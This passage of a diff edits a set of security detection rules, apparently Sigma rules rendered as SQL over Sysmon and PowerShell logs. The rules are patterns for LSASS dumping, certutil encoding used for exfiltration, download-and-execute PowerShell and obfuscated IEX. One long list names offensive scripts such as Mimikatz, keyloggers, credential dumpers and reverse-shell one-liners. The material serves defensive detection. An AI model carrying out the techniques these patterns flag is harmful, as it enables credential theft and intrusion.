LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_hktl_handlekatz.yml" }, { - "title": "Alternate PowerShell Hosts - PowerShell Module", - "id": "64e8e417-c19a-475a-8d19-98ea705394cc", + "title": "Microsoft Workflow Compiler Execution", + "id": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", + "author": "Nik Seetharaman, frack113", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.t1127", + "attack.t1218" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" + "Legitimate MWC use (unlikely in modern enterprise environments)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ContextInfo LIKE '%' ESCAPE '\\' AND NOT (((ContextInfo LIKE '%= powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/System32/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\')) OR (ContextInfo LIKE '%= C:\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe -Embedding%' ESCAPE '\\') OR (ContextInfo LIKE '%ConfigSyncRun.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\dsac.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\wsmprovhost.exe -Embedding%' ESCAPE '\\') OR ((Payload LIKE '%Update-Help%' ESCAPE '\\' OR Payload LIKE '%Failed to update Help for the module%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR OriginalFileName = 'Microsoft.Workflow.Compiler.exe'))" ], - "filename": "posh_pm_alternate_powershell_hosts.yml" + "filename": "proc_creation_win_lolbin_workflow_compiler.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", - "id": "2f211361-7dce-442d-b78a-c04039677378", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "File Encoded To Base64 Via Certutil.EXE", + "id": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", + "status": "test", + "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-encode%' ESCAPE '\\' OR CommandLine LIKE '%/encode%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_certutil_encode.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", - "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", - "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Tasks Folder Evasion", + "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "status": "test", + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1027", + "attack.persistence", "attack.execution", - "attack.t1059.001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_stdin.yml" + "filename": "proc_creation_win_susp_task_folder_evasion.yml" }, { - "title": "Suspicious Computer Machine Password by PowerShell", - "id": "e3818659-5016-4811-a73c-dde4679169d2", + "title": "Potential PowerShell Execution Via DLL", + "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", "status": "test", - "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", - "author": "frack113", + "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", + "author": "Markus Neis, Nasreddine Bencherchali", "tags": [ - "attack.initial_access", - "attack.t1078" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Reset-ComputerMachinePassword%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_reset_computermachinepassword.yml" + "filename": "proc_creation_win_powershell_dll_execution.yml" }, { - "title": "Malicious PowerShell Scripts - PoshModule", - "id": "41025fd7-0466-4650-a813-574aaacbe7f4", - "status": "experimental", - "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", - "author": "frack113, Nasreddine Bencherchali", + "title": "OilRig APT Activity", + "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", + "status": "test", + "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" ], - "filename": "posh_pm_exploit_scripts.yml" + "filename": "proc_creation_win_apt_oilrig_mar18.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - PsModule", - "id": "74176142-4684-4d8a-8b0a-713257e7df8e", - "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Operation Wocao Activity", + "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "status": "test", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.reconnaissance", "attack.discovery", - 